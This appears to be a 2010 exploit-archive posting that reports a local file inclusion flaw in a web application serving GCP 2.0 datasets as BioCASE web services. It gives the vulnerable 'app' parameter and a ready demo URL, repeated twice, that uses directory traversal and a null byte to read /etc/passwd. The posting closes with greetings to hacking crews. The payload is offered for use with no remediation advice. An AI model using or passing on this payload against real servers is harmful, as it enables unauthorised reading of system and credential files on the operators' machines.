[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : GCP 2.0 datasets provided as BioCASE web services
# Published : 2010-02-02
# Author : R3VAN_BASTARD
# Previous Title : Joomla Component com_gurujibook SQL injection Vulnerability
# Next Title : Dlili Script SQL Injection Vulnerability
========================================================================
# .::GCP 2.0 datasets provided as BioCASE web services::. #
# (Local File Inclusion) #
========================================================================
========================================================================
Author : R3VAN_BASTARD
Site : www.sux0r.net
Provider: http://www.biocase.org
========================================================================
[x] Vulnerability:/index.php?app=
========================================================================
[x] demo:
http://[server]/index.php?app=../../../../../../../../../etc/passwd%00&inc=dataset_details&dataset_id=625
http://[server]/index.php?app=../../../../../../../../../etc/passwd%00&inc=dataset_details&dataset_id=625
=========================================================================
saludos cordiales:
VALENCIA : S3T4N : YOGA0400 : JACK (PAMAN) : VRS-HCK : YADOY666
NOGE : OON_BOY : MADONK : KECEMPLUNG-KALEN : YUDIS : DECLINED
BADFELLAS.co : ALL HIP-HOP "satu atap" : BASS PRO "rhythm and Distortion"
MAINHACK : SERVER IS DOWN : ALL POINT BLANK PLAYER FEEL THE HEAD SHOT
=========================================================================